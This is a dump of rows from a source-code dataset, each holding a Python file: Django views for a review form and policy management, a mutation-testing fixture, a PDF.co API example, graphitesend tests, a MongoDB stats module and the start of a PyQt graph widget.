| true
| false
| false
|
uw-it-aca/mdot-developers
|
mdotdevs/views.py
|
1
|
3614
|
from django.conf import settings
from django.template.loader import get_template
from django.template import RequestContext, Context
from django.shortcuts import render_to_response, render
from django.core.mail import send_mail, BadHeaderError
from django.http import HttpResponse, HttpResponseRedirect
import urllib
import json
from forms import ReviewForm
def home(request):
return render_to_response(
'mdotdevs/home.html',
context_instance=RequestContext(request))
def guidelines(request):
return render_to_response(
'mdotdevs/guidelines.html',
context_instance=RequestContext(request))
def process(request):
return render_to_response(
'mdotdevs/process.html',
context_instance=RequestContext(request))
def review(request):
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = ReviewForm(request.POST)
# check whether it's valid:
if form.is_valid():
campus_audience = form.cleaned_data['campus_audience']
campus_need = form.cleaned_data['campus_need']
sponsor_name = form.cleaned_data['sponsor_name']
sponsor_netid = form.cleaned_data['sponsor_netid']
sponsor_email = form.cleaned_data['sponsor_email']
dev_name = form.cleaned_data['dev_name']
dev_email = form.cleaned_data['dev_email']
support_name = form.cleaned_data['support_name']
support_email = form.cleaned_data['support_email']
support_contact = form.cleaned_data['support_contact']
ats_review = form.cleaned_data['ats_review']
ux_review = form.cleaned_data['ux_review']
brand_review = form.cleaned_data['brand_review']
app_documentation = form.cleaned_data['app_documentation']
app_code = form.cleaned_data['app_code']
anything_else = form.cleaned_data['anything_else']
email_context = Context({
'campus_audience': campus_audience,
'campus_need': campus_need,
'sponsor_name': sponsor_name,
'sponsor_netid': sponsor_netid,
'sponsor_email': sponsor_email,
'dev_name': dev_name,
'dev_email': dev_email,
'support_name': support_name,
'support_email': support_email,
'support_contact': support_contact,
'ats_review': ats_review,
'ux_review': ux_review,
'brand_review': brand_review,
'app_documentation': app_documentation,
'app_code': app_code,
'anything_else': anything_else
})
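            # Send the review request as both a plain-text and an HTML email;
            # a malformed header raises BadHeaderError, which is handled below.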
try:
send_mail(
sponsor_name,
get_template(
'mdotdevs/email_plain.html').render(email_context),
sponsor_email, ['jcivjan@uw.edu'],
html_message=get_template('mdotdevs/email_html.html')
.render(email_context),
                )
except BadHeaderError:
return HttpResponse('Invalid header found.')
return render_to_response(
'mdotdevs/thanks.html',
context_instance=RequestContext(request))
# if a GET (or any other method) we'll create a blank form
else:
form = ReviewForm()
return render(request, 'mdotdevs/review.html', {'form': form})
|
apache-2.0
| -5,927,210,176,114,259,000
| 38.714286
| 76
| 0.589651
| false
| 4.17321
| false
| false
| false
|
yayoiukai/signalserver
|
policies/views.py
|
1
|
11360
|
import os
import datetime
import errno
from django.shortcuts import render
from django.http import HttpResponse
from django.template import loader
from django.http import HttpResponseRedirect, Http404
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.utils.encoding import smart_str
from xml.dom import minidom
from xml.etree.ElementTree import Element, SubElement, Comment
import xml.etree.ElementTree as ET
from .models import Policy, Operation, PolicyFile
from fileuploads.constants import POLICY_FILEPATH
from groups.models import Result, Row, Process
from .forms import PolicyNameForm
from .forms import PolicyForm
from .forms import PolicyFileForm
from .forms import OperationForm
def replace_letters(policy_name):
if " " in policy_name:
policy_name = policy_name.replace(' ', '_')
if "-" in policy_name:
policy_name = policy_name.replace('-', '_')
return policy_name
def get_dashboard_value(request, keyword='dashboard'):
    if keyword not in request.POST:
dashboard = False
else:
dashboard = True
return dashboard
@login_required(login_url="/login/")
def index(request):
if request.method == 'POST':
policy_name = request.POST['policy_name']
policy_name = replace_letters(policy_name)
description = request.POST['description']
dashboard = get_dashboard_value(request)
display_order = request.POST['display_order']
count = Policy.objects.filter(
policy_name=policy_name).count()
if count > 0:
message = "policy name : " + policy_name + " is already taken. \
Please choose different name. Policy name needs to be unique."
return render_index(request, message)
else:
new_policy = Policy(
policy_name=policy_name,
display_order=display_order,
description=description,
dashboard=dashboard
)
new_policy.save()
return render_index(request, None)
def render_index(request, message):
    form = PolicyForm()  # An empty, unbound form
file_form = PolicyFileForm()
# Load documents for the list page
policies = Policy.objects.all().order_by('display_order')
new_display_order = policies.count() + 1
# Render list page with the documents and the form
return render(request, 'policies/index.html',
{'policies': policies, 'form': form, 'file_form': file_form,
'message': message, 'new_display_order': new_display_order})
def delete_policy(request, policy_id):
Policy.objects.get(id=policy_id).delete()
return HttpResponseRedirect(reverse('policies:index'))
def create_policy_xml(policy, file_name):
root = ET.Element("policy", name=policy.policy_name)
description = ET.SubElement(root, "description")
description.text = policy.description
operations = Operation.objects.filter(policy=policy)
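    # Serialise every operation as a <rule> element; the rule id comes from the
    # operation's display order and the rule text from its description.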
for op in operations:
ET.SubElement(root, "rule", id=str(op.display_order),
filter_01=op.signal_name,
filter_02=op.second_signal_name, operation=op.op_name,
cutoff_number=str(op.cut_off_number),
dashboard=str(op.dashboard),
group_percentage=str(op.percentage),
file_percentage=str(op.file_percentage)
).text = op.description
xmlstr = minidom.parseString(ET.tostring(root)).toprettyxml(indent=" ")
with open(file_name, "w") as f:
f.write(xmlstr)
def get_or_create_policy_file(policy):
original_file_name = policy.policy_name + ".xml"
file_name = os.path.join(POLICY_FILEPATH, original_file_name)
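    # Always regenerate the XML from the current database state, removing any
    # stale copy of the file first.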
if os.path.exists(file_name):
try:
os.remove(file_name)
except OSError as e:
            # errno.ENOENT = no such file or directory
            if e.errno != errno.ENOENT:
                raise  # re-raise the exception if a different error occurred
create_policy_xml(policy, file_name)
return file_name
def download_policy(request, policy_id):
policy = Policy.objects.get(id=policy_id)
file_name = policy.policy_name
file_path = get_or_create_policy_file(policy)
file_itself = open(file_path, 'rb')
response = HttpResponse(file_itself,
content_type='application/force-download')
response['X-Sendfile'] = file_path
response['Content-Length'] = os.stat(file_path).st_size
response['Content-Disposition'] = 'attachment; \
filename={}.xml'.format(smart_str(file_name))
return response
def create_policy_from_file(file_name):
new_file_name = os.path.join(POLICY_FILEPATH, file_name)
tree = ET.parse(new_file_name)
root = tree.getroot()
policy_name = root.attrib['name']
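    # Avoid a name clash with an existing policy by appending an upload timestamp.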
if Policy.objects.filter(policy_name=policy_name).count() > 0:
d = datetime.datetime.now()
policy_name = policy_name + '_uploaded_on_' + \
d.strftime("%Y_%m_%d_%H:%M")
desc = root.findall('description')[0].text
new_policy = Policy(
policy_name=policy_name,
description=desc
)
new_policy.save()
for child in root:
if child.tag == 'description':
continue
rule = child.attrib
desc = rule.get('description')
if desc is None:
desc = "No description"
new_operation = Operation(
policy=new_policy,
cut_off_number=rule.get('cutoff_number'),
signal_name=rule.get('filter_01'),
second_signal_name=rule.get('filter_02'),
op_name=rule.get('operation'),
description=desc,
percentage=rule.get('group_percentage'),
file_percentage=rule.get('file_percentage'),
dashboard=rule.get('dashboard')
)
new_operation.save()
@login_required(login_url="/login/")
def upload(request):
# Handle policy file upload
user_name = request.user.username
message = None
if request.method == 'POST':
form = PolicyFileForm(request.POST, request.FILES)
policy_file = request.FILES.get('policyfile')
if form.is_valid():
original_name = policy_file.name
extension = original_name[-4:]
if extension != ".xml":
message = "File format needs to be .xml. Your file is "
message = message + original_name + "\n"
else:
new_policy_file = PolicyFile(
policy_file=policy_file,
file_name=original_name,
)
new_policy_file.save()
create_policy_from_file(original_name)
else:
message = "something wrong with form"
return HttpResponseRedirect(reverse('policies:index'))
def delete_rule(request, op_id, policy_id):
Operation.objects.get(id=op_id).delete()
return HttpResponseRedirect(reverse('policies:show',
kwargs={'policy_id': policy_id}))
def edit_rule(policy, op_name, cutoff_num, sig_name, sig2_name,
display_order, description, percentage,
file_percentage, dashboard, id_num):
operation = Operation.objects.get(id=id_num)
operation.policy = policy
operation.cut_off_number = cutoff_num
operation.signal_name = sig_name
operation.second_signal_name = sig2_name
operation.op_name = op_name
operation.description = description
operation.percentage = percentage
operation.file_percentage = file_percentage
operation.dashboard = dashboard
operation.save()
def add_rule(policy, op_name, cutoff_num, sig_name, sig2_name,
display_order, description, percentage,
file_percentage, dashboard):
new_operation = Operation(
policy=policy,
cut_off_number=cutoff_num,
signal_name=sig_name,
second_signal_name=sig2_name,
op_name=op_name,
display_order=display_order,
description=description,
percentage=percentage,
file_percentage=file_percentage,
dashboard=dashboard
)
new_operation.save()
def update_policy(request, policy):
keyword = 'policy_dashboard'
dashboard = get_dashboard_value(request, keyword)
version = request.POST['version']
policy.dashboard = dashboard
policy.version = version
policy.save()
return policy
@login_required(login_url="/login/")
def show(request, policy_id):
policy = Policy.objects.get(id=policy_id)
if request.method == 'POST':
form = OperationForm(request.POST)
action = request.POST['action']
if action == "update_policy":
policy = update_policy(request, policy)
else:
dashboard = get_dashboard_value(request)
cutoff_num = request.POST.get('cutoff_number', 0)
sig_name = request.POST['signal_fields']
sig2_name = request.POST['second_signal_fields']
op_name = request.POST['operation_fields']
display_order = request.POST['display_order']
description = request.POST['description']
percentage = request.POST['percentage']
file_percentage = request.POST['file_percentage']
if action == 'new':
add_rule(policy, op_name, cutoff_num, sig_name, sig2_name,
display_order, description, percentage,
file_percentage, dashboard)
else:
id_num = request.POST['id_num']
edit_rule(policy, op_name, cutoff_num, sig_name, sig2_name,
display_order, description, percentage,
file_percentage, dashboard,
id_num)
policy.user_name = request.user.username
policy.save()
operation = Operation.objects.filter(
policy=policy).order_by('display_order')
length = len(operation) + 1
    form = OperationForm()  # An empty, unbound form
return render(request, 'policies/show.html',
{'policy': policy,
'form': form,
'operation': operation, 'length': length})
def rename(request):
if request.method == 'POST':
old_name = request.POST['old_name']
new_name = request.POST['new_name']
new_name = replace_letters(new_name)
policy = Policy.objects.get(
policy_name=old_name)
processes = Process.objects.filter(policy_name=old_name)
for process in processes:
process.policy_name = new_name
process.save()
policy.policy_name = new_name
policy.save()
return HttpResponseRedirect(reverse('policies:show',
kwargs={'policy_id': policy.id}))
def results(request, policy_id):
response = "result of policies %s."
return HttpResponse(response % policy_id)
def detail(request, operation_id):
try:
operation = Operation.objects.get(pk=operation_id)
except Operation.DoesNotExist:
raise Http404("Operation does not exist")
return render(request, 'policies/detail.html', {'operation': operation})
|
mit
| -2,504,476,941,914,115,600
| 35.178344
| 79
| 0.617077
| false
| 4.126408
| false
| false
| false
|
sixty-north/cosmic-ray
|
tests/resources/example_project/adam/adam_1.py
|
1
|
1178
|
"""adam.adam_1
"""
# pylint: disable=C0111
import operator
from math import * # noqa: F401,F403
# Add mutation points for comparison operators.
def constant_number():
return 42
def constant_true():
return True
def constant_false():
return False
def bool_and():
return object() and None
def bool_or():
return object() or None
def bool_expr_with_not():
return not object()
def bool_if():
if object():
return True
raise Exception("bool_if() failed")
def if_expression():
return True if object() else None
def assert_in_func():
assert object()
return True
def unary_sub():
return -1
def unary_add():
return +1
def binary_add():
return 5 + 6
def equals(vals):
def constraint(x, y):
return operator.xor(x == y, x != y)
return all([constraint(x, y) for x in vals for y in vals])
def use_break(limit):
for x in range(limit):
break
return x
def use_continue(limit):
for x in range(limit):
continue
return x
def use_star_args(*args):
pass
def use_extended_call_syntax(x):
use_star_args(*x)
def use_star_expr(x):
a, *b = x
|
mit
| 6,149,737,179,712,978,000
| 11.804348
| 62
| 0.611205
| false
| 3.346591
| false
| false
| false
|
bytescout/ByteScout-SDK-SourceCode
|
PDF.co Web API/Add Text And Images To PDF/Python/Add Image by finding target coordinates/AddImageByFindingTargetCoordinates.py
|
1
|
3639
|
import os
import requests # pip install requests
# The authentication key (API Key).
# Get your own by registering at https://app.pdf.co/documentation/api
API_KEY = "**************************************"
# Base URL for PDF.co Web API requests
BASE_URL = "https://api.pdf.co/v1"
# Direct URL of source PDF file.
SourceFileUrl = "https://bytescout-com.s3.amazonaws.com/files/demo-files/cloud-api/pdf-edit/sample.pdf"
# Search string.
SearchString = 'Your Company Name'
# Comma-separated list of page indices (or ranges) to process. Leave empty for all pages. Example: '0,2-5,7-'.
Pages = ""
# PDF document password. Leave empty for unprotected documents.
Password = ""
# Destination PDF file name
DestinationFile = ".//result.pdf"
# Image params
Type = "image"
Width = 119
Height = 32
ImageUrl = "https://bytescout-com.s3.amazonaws.com/files/demo-files/cloud-api/pdf-edit/logo.png"
def main(args = None):
# First of all try to find Text within input PDF file
res = findTextWithinPDF(SourceFileUrl, SearchString)
if res:
addImageToPDF(DestinationFile, res['top'], res['left'])
else:
print("No result found!")
def findTextWithinPDF(sourceFile, searchText):
# Prepare URL for PDF text search API call
# See documentation: https://app.pdf.co/documentation/api/1.0/pdf/find.html
retVal = dict()
# Prepare requests params as JSON
# See documentation: https://apidocs.pdf.co
parameters = {}
parameters["url"] = sourceFile
parameters["searchString"] = searchText
url = "{}/pdf/find".format(BASE_URL)
# Execute request and get response as JSON
response = requests.post(url, data=parameters, headers={"x-api-key": API_KEY})
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# print(json)
if json["body"]:
retVal['top'] = json["body"][0]['top']
retVal['left'] = json["body"][0]['left']
else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
return retVal
def addImageToPDF(destinationFile, top, left):
"""Add image using PDF.co Web API"""
# Prepare requests params as JSON
# See documentation: https://apidocs.pdf.co
parameters = {}
parameters["name"] = os.path.basename(destinationFile)
parameters["password"] = Password
parameters["pages"] = Pages
parameters["url"] = SourceFileUrl
parameters["type"] = Type
parameters["x"] = top + 300
parameters["y"] = left
parameters["width"] = Width
parameters["height"] = Height
parameters["urlimage"] = ImageUrl
# Prepare URL for 'PDF Edit' API request
url = "{}/pdf/edit/add".format(BASE_URL)
# Execute request and get response as JSON
response = requests.post(url, data=parameters, headers={"x-api-key": API_KEY})
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# Get URL of result file
resultFileUrl = json["url"]
# Download result file
r = requests.get(resultFileUrl, stream=True)
with open(destinationFile, 'wb') as file:
for chunk in r:
file.write(chunk)
print(f"Result file saved as \"{destinationFile}\" file.")
else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
if __name__ == '__main__':
main()
|
apache-2.0
| 3,477,542,829,167,449,600
| 29.082645
| 110
| 0.623523
| false
| 3.814465
| false
| false
| false
|
numberly/graphitesend
|
tests/test_all.py
|
1
|
10724
|
#!/usr/bin/env python
from graphitesend import graphitesend
import unittest
import socket
import os
class TestAll(unittest.TestCase):
""" Basic tests ( better than nothing ) """
def setUp(self):
""" reset graphitesend """
# Drop any connections or modules that have been setup from other tests
graphitesend.reset()
# Monkeypatch the graphitesend so that it points at a graphite service
# running on one of my (dannyla@linux.com) systems.
# graphitesend.default_graphite_server = 'graphite.dansysadm.com'
graphitesend.default_graphite_server = 'localhost'
self.hostname = os.uname()[1]
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind(('localhost', 2003))
self.server.listen(5)
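        # Listening on localhost:2003 (the default Carbon plaintext port) lets
        # individual tests accept() the client connection and assert on the raw
        # bytes graphitesend writes to the socket (see
        # test_send_list_metric_value_timestamp_default_2).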
def tearDown(self):
""" reset graphitesend """
# Drop any connections or modules that have been setup from other tests
graphitesend.reset()
try:
self.server.shutdown(socket.SHUT_RD)
self.server.close()
except Exception:
pass
self.server = None
def test_connect_exception_on_badhost(self):
bad_graphite_server = 'missinggraphiteserver.example.com'
graphitesend.default_graphite_server = bad_graphite_server
with self.assertRaises(graphitesend.GraphiteSendException):
graphitesend.init()
def test_set_lowercase_metric_names(self):
g = graphitesend.init(lowercase_metric_names=True)
self.assertEqual(g.lowercase_metric_names, True)
def test_lowercase_metric_names(self):
g = graphitesend.init(lowercase_metric_names=True)
send_data = g.send('METRIC', 1)
self.assertEqual('metric' in send_data, True)
self.assertEqual('METRIC' in send_data, False)
def test_create_graphitesend_instance(self):
g = graphitesend.init()
expected_type = type(graphitesend.GraphiteClient())
g_type = type(g)
self.assertEqual(g_type, expected_type)
def test_monkey_patch_of_graphitehost(self):
g = graphitesend.init()
custom_prefix = g.addr[0]
self.assertEqual(custom_prefix, 'localhost')
def test_fqdn_squash(self):
g = graphitesend.init(fqdn_squash=True)
custom_prefix = g.prefix
expected_results = 'systems.%s.' % self.hostname.replace('.', '_')
self.assertEqual(custom_prefix, expected_results)
def test_noprefix(self):
g = graphitesend.init()
custom_prefix = g.prefix
self.assertEqual(custom_prefix, 'systems.%s.' % self.hostname)
def test_system_name(self):
g = graphitesend.init(system_name='remote_host')
custom_prefix = g.prefix
expected_prefix = 'systems.remote_host.'
self.assertEqual(custom_prefix, expected_prefix)
def test_empty_system_name(self):
g = graphitesend.init(system_name='')
custom_prefix = g.prefix
expected_prefix = 'systems.'
self.assertEqual(custom_prefix, expected_prefix)
def test_no_system_name(self):
g = graphitesend.init(group='foo')
custom_prefix = g.prefix
expected_prefix = 'systems.%s.foo.' % self.hostname
self.assertEqual(custom_prefix, expected_prefix)
def test_prefix(self):
g = graphitesend.init(prefix='custom_prefix')
custom_prefix = g.prefix
self.assertEqual(custom_prefix, 'custom_prefix.%s.' % self.hostname)
def test_prefix_double_dot(self):
g = graphitesend.init(prefix='custom_prefix.')
custom_prefix = g.prefix
self.assertEqual(custom_prefix, 'custom_prefix.%s.' % self.hostname)
def test_prefix_remove_spaces(self):
g = graphitesend.init(prefix='custom prefix')
custom_prefix = g.prefix
self.assertEqual(custom_prefix, 'custom_prefix.%s.' % self.hostname)
def test_set_prefix_group(self):
g = graphitesend.init(prefix='prefix', group='group')
custom_prefix = g.prefix
expected_prefix = 'prefix.%s.group.' % self.hostname
self.assertEqual(custom_prefix, expected_prefix)
def test_set_prefix_group_system(self):
g = graphitesend.init(prefix='prefix', system_name='system',
group='group')
custom_prefix = g.prefix
expected_prefix = 'prefix.system.group.'
self.assertEqual(custom_prefix, expected_prefix)
def test_set_suffix(self):
g = graphitesend.init(suffix='custom_suffix')
custom_suffix = g.suffix
self.assertEqual(custom_suffix, 'custom_suffix')
def test_set_group_prefix(self):
g = graphitesend.init(group='custom_group')
expected_prefix = "systems.%s.custom_group." % self.hostname
custom_prefix = g.prefix
self.assertEqual(custom_prefix, expected_prefix)
def test_default_prefix(self):
g = graphitesend.init()
expected_prefix = "systems.%s." % self.hostname
custom_prefix = g.prefix
self.assertEqual(custom_prefix, expected_prefix)
def test_leave_suffix(self):
g = graphitesend.init()
default_suffix = g.suffix
self.assertEqual(default_suffix, '')
def test_clean_metric(self):
g = graphitesend.init()
#
metric_name = g.clean_metric_name('test(name)')
self.assertEqual(metric_name, 'test_name')
#
metric_name = g.clean_metric_name('test name')
self.assertEqual(metric_name, 'test_name')
#
        metric_name = g.clean_metric_name('test  name')
self.assertEqual(metric_name, 'test__name')
def test_reset(self):
graphitesend.init()
graphitesend.reset()
graphite_instance = graphitesend._module_instance
self.assertEqual(graphite_instance, None)
def test_force_failure_on_send(self):
graphite_instance = graphitesend.init()
graphite_instance.disconnect()
with self.assertRaises(graphitesend.GraphiteSendException):
graphite_instance.send('metric', 0)
def test_force_unknown_failure_on_send(self):
graphite_instance = graphitesend.init()
graphite_instance.socket = None
with self.assertRaises(graphitesend.GraphiteSendException):
graphite_instance.send('metric', 0)
def test_send_list_metric_value(self):
graphite_instance = graphitesend.init(prefix='test', system_name='local')
response = graphite_instance.send_list([('metric', 1)])
self.assertEqual('long message: test.local.metric 1' in response, True)
self.assertEqual('1.00000' in response, True)
def test_send_list_metric_value_single_timestamp(self):
# Make sure it can handle custom timestamp
graphite_instance = graphitesend.init(prefix='test')
response = graphite_instance.send_list([('metric', 1)], timestamp=1)
# self.assertEqual('sent 23 long message: test.metric' in response,
# True)
self.assertEqual('1.00000' in response, True)
self.assertEqual(response.endswith('1\n'), True)
def test_send_list_metric_value_timestamp(self):
graphite_instance = graphitesend.init(prefix='test')
# Make sure it can handle custom timestamp
response = graphite_instance.send_list([('metric', 1, 1)])
# self.assertEqual('sent 23 long message: test.metric' in response,
# True)
self.assertEqual('1.00000' in response, True)
self.assertEqual(response.endswith('1\n'), True)
def test_send_list_metric_value_timestamp_2(self):
graphite_instance = graphitesend.init(prefix='test', system_name='')
# Make sure it can handle custom timestamp
response = graphite_instance.send_list(
[('metric', 1, 1), ('metric', 1, 2)])
# self.assertEqual('sent 46 long message:' in response, True)
self.assertEqual('test.metric 1.000000 1' in response, True)
self.assertEqual('test.metric 1.000000 2' in response, True)
def test_send_list_metric_value_timestamp_3(self):
graphite_instance = graphitesend.init(prefix='test', system_name='')
# Make sure it can handle custom timestamp, fill in the missing with
# the current time.
response = graphite_instance.send_list(
[
('metric', 1, 1),
('metric', 2),
]
)
# self.assertEqual('sent 46 long message:' in response, True)
self.assertEqual('test.metric 1.000000 1' in response, True)
self.assertEqual('test.metric 2.000000 2' not in response, True)
def test_send_list_metric_value_timestamp_default(self):
graphite_instance = graphitesend.init(prefix='test', system_name='bar')
# Make sure it can handle custom timestamp, fill in the missing with
# the current time.
response = graphite_instance.send_list(
[
('metric', 1, 1),
('metric', 2),
],
timestamp='4'
)
# self.assertEqual('sent 69 long message:' in response, True)
self.assertEqual('test.bar.metric 1.000000 1' in response, True)
self.assertEqual('test.bar.metric 2.000000 4' in response, True)
def test_send_list_metric_value_timestamp_default_2(self):
graphite_instance = graphitesend.init(prefix='test', system_name='foo')
# Make sure it can handle custom timestamp, fill in the missing with
# the current time.
(c, addr) = self.server.accept()
response = graphite_instance.send_list(
[
('metric', 1),
('metric', 2, 2),
],
timestamp='4'
)
# self.assertEqual('sent 69 long message:' in response, True)
self.assertEqual('test.foo.metric 1.000000 4' in response, True)
self.assertEqual('test.foo.metric 2.000000 2' in response, True)
sent_on_socket = c.recv(69)
self.assertEqual('test.foo.metric 1.000000 4' in sent_on_socket, True)
self.assertEqual('test.foo.metric 2.000000 2' in sent_on_socket, True)
# self.server.shutdown(socket.SHUT_RD)
# self.server.close()
def test_send_value_as_string(self):
# Make sure it can handle custom timestamp
graphite_instance = graphitesend.init(prefix='')
response = graphite_instance.send("metric", "1", "1")
self.assertEqual('1.00000' in response, True)
        print(response)
self.assertEqual(response.endswith('1\n'), True)
if __name__ == '__main__':
unittest.main()
|
apache-2.0
| -6,224,074,902,658,010,000
| 39.014925
| 81
| 0.631854
| false
| 3.875678
| true
| false
| false
|
reedessick/pointy-Poisson
|
stripRawUnsafe.py
|
1
|
1801
|
#!/usr/bin/python
usage = "stripRawUnsafe.py unsafe.txt interesting.txt"
description = "reads in a list of unsafe channels from unsafe.txt. If these are not \"raw\" channel names, it converts them to that form. I then reads in a channel list from interesting.txt and performs a filter based on the unsafe channels. Channels not flagged as unsafe are printed to stdout while channels flagged as unsafe are printed to stderr"
author = "reed.essick@ligo.org"
import sys
from collections import defaultdict
from optparse import OptionParser
#-------------------------------------------------
parser = OptionParser(usage=usage, description=description)
opts, args = parser.parse_args()
if len(args)!=2:
raise ValueError("Please supply exactly 2 input arguments\n%s"%(usage))
unsafe, interesting = args
#-------------------------------------------------
### read in unsafe channel list
file_obj = open(unsafe, "r")
unsafe_chans = defaultdict( set )
for chan in file_obj:
chan = chan.strip()
    if chan[2] == "-": ### interpret as KW channel name -> convert!
chan = chan.split("_")
ifo, chan = chan[0], "%s"%("_".join(chan[1:-2]))
else:
ifo, chan = chan.split(":")
unsafe_chans[ifo].add( chan )
file_obj.close()
#-------------------------------------------------
### read in interesting channel list and parse
file_obj = open(interesting, "r")
for channel in file_obj:
channel = channel.strip()
chan = channel
    if chan[2] == "-": ### interpret as KW channel name -> convert!
chan = chan.split("_")
ifo, chan = chan[0], "%s"%("_".join(chan[1:-2]))
else:
ifo, chan = chan.split(":")
if chan in unsafe_chans[ifo]:
print >> sys.stderr, channel
else:
print >> sys.stdout, channel
file_obj.close()
|
mit
| -4,477,093,486,662,943,000
| 33.634615
| 350
| 0.60633
| false
| 3.848291
| false
| false
| false
|
terasaur/tstracker
|
mqclient/src/tstracker/stats_db.py
|
1
|
2493
|
#
# Copyright 2012 ibiblio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import terasaur.db.mongodb_db as mongodb_db
import pymongo
from datetime import datetime
import pytz
"""
Functions for storing and retrieving torrent statistics data. See
torrent_stats module for details about data model.
"""
STATS_CONTROL_COLLECTION = 'stats_control'
STATS_DATA_MINUTE = 'stats_minute'
STATS_DATA_HOUR = 'stats_hour'
STATS_DATA_DAY = 'stats_day'
def get_control_value(key):
result = mongodb_db.get(STATS_CONTROL_COLLECTION, {'_id': key})
if result:
return result['v']
else:
return None
def set_control_value(key, value):
query = {'_id': key}
data = {"$set": {'v': value}}
mongodb_db.update(STATS_CONTROL_COLLECTION, query, data)
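# The control collection holds single-document key/value pairs: each document
# is {'_id': <key>, 'v': <value>}. initialize() below seeds the capture
# timestamps ('last_incremental', 'last_capture_minute', ...) with the Unix
# epoch via _initialize_date().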
def get_conn():
return mongodb_db.get_db_conn()
def get_minute_stats(torrent):
return _get_stats(STATS_DATA_MINUTE, torrent)
def get_hour_stats(torrent):
return _get_stats(STATS_DATA_HOUR, torrent)
def get_day_stats(torrent):
return _get_stats(STATS_DATA_DAY, torrent)
def _get_stats(timeframe, torrent):
conn = get_conn()
db = conn[mongodb_db.DB_PARAMS['db_name']]
res = db[timeframe].find({'ih':torrent.info_hash}).sort('ih')
return res
def initialize():
conn = mongodb_db.get_db_conn()
db = conn[mongodb_db.DB_PARAMS['db_name']]
# info hash index
db[STATS_DATA_MINUTE].ensure_index('info_hash')
db[STATS_DATA_HOUR].ensure_index('info_hash')
db[STATS_DATA_DAY].ensure_index('info_hash')
# control keys
_initialize_date(db, 'last_incremental')
_initialize_date(db, 'last_capture_minute')
_initialize_date(db, 'last_capture_hour')
_initialize_date(db, 'last_capture_day')
conn.end_request()
def _initialize_date(db, key):
value = get_control_value(key)
if value is None:
zero_date = datetime(1970, 1, 1, 0, 0, 0, 0, pytz.utc)
data = {'_id': key, 'v': zero_date}
db[STATS_CONTROL_COLLECTION].save(data)
|
apache-2.0
| 6,713,933,945,272,915,000
| 29.777778
| 74
| 0.686723
| false
| 3.280263
| false
| false
| false
|
ESSS/qmxgraph
|
qmxgraph/widget.py
|
1
|
23408
|
from __future__ import absolute_import
import json
import os
import weakref
from PyQt5.QtCore import QDataStream, QIODevice, QObject, Qt, pyqtSignal
from PyQt5.QtGui import QPainter
from PyQt5.QtWidgets import QDialog, QGridLayout, QShortcut, QSizePolicy, \
QWidget, QStyleOption, QStyle
from qmxgraph import constants, render
from qmxgraph.api import QmxGraphApi
from qmxgraph.configuration import GraphOptions, GraphStyles
from ._web_view import QWebViewWithDragDrop
# Some ugliness to successfully build the doc on ReadTheDocs...
on_rtd = os.environ.get('READTHEDOCS') == 'True'
if not on_rtd:
from qmxgraph import resource_mxgraph, resource_qmxgraph # noqa
class QmxGraph(QWidget):
"""
    A graph widget that is actually a web view using mxGraph_ as its backend,
    a very feature-rich JS graph library which is also used as the backend of
    the powerful Google Drive's draw.io widget.
**Tags**
Tags don't have any impact or influence on QmxGraph features. It is just a
feature so client code can associate custom data with cells created in a
graph.
Tags can be helpful, for instance, to be able to infer an
application-specific type of a dragged & dropped new cell. When added cell
events are handled, client code can just query tags to know this
information. Without tags, it would need to infer based on unreliable
heuristics like current style or label.
An important observation is that tag values are *always* strings. If a
    value of another type is used, it will raise an error.
**Debug/Inspection**
It is possible to open a web inspector for underlying graph drawing page by
typing `F12` with widget focused.
.. _mxGraph: https://jgraph.github.io/mxgraph/
"""
# Signal fired when underlying web view finishes loading. Argument
# indicates if loaded successfully.
loadFinished = pyqtSignal(bool)
def __init__(
self,
options=None,
styles=None,
stencils=tuple(),
auto_load=True,
parent=None,
):
"""
:param qmxgraph.configuration.GraphOptions|None options: Features
enabled in graph drawing widget. If none given, uses defaults.
:param qmxgraph.configuration.GraphStyles|None styles: Additional
styles made available for graph drawing widget besides mxGraph's
default ones. If none given only mxGraph defaults are available.
:param iterable[str] stencils: A sequence of XMLs available in Qt
resource collections. Each XML must respect format defined by
mxGraph (see
https://jgraph.github.io/mxgraph/docs/js-api/files/shape/mxStencil-js.html#mxStencil
and
https://jgraph.github.io/mxgraph/javascript/examples/stencils.xml
for reference).
:param bool auto_load: If should load page as soon as widget is
initialized.
:param QWidget|None parent: Parent widget.
"""
QWidget.__init__(self, parent)
self._own_path = ':/qmxgraph'
self._mxgraph_path = ':/mxgraph'
if options is None:
options = GraphOptions()
self._options = options
if styles is None:
styles = GraphStyles(styles={})
self._styles = styles
self._stencils = stencils
# Web view fills whole widget area
self._layout = QGridLayout(self)
self._layout.setContentsMargins(0, 0, 0, 0) # no margin to web view
self._web_view = QWebViewWithDragDrop()
self._web_view.setSizePolicy(
QSizePolicy.Expanding, QSizePolicy.Expanding)
# Starts disabled, only enable once finished loading page (as user
# interaction before that would be unsafe)
# TODO: widget remain with disabled appearance even after enabled
# self.setEnabled(False)
self._layout.addWidget(self._web_view, 0, 0, 1, 1)
self._error_bridge = None
self._events_bridge = None
self._drag_drop_handler = None
# Similar to a browser, QmxGraph widget is going to allow inspection by
# typing F12
self._inspector_dialog = None
inspector_shortcut = QShortcut(self)
inspector_shortcut.setKey("F12")
inspector_shortcut.activated.connect(self.toggle_inspector)
self._execute_on_load_finished()
self._api = QmxGraphApi(graph=self)
self._web_view.on_drag_enter_event.connect(self._on_drag_enter)
self._web_view.on_drag_move_event.connect(self._on_drag_move)
self._web_view.on_drop_event.connect(self._on_drop)
self._double_click_bridge = _DoubleClickBridge()
self._popup_menu_bridge = _PopupMenuBridge()
if auto_load:
self._load_graph_page()
def paintEvent(self, paint_event):
"""
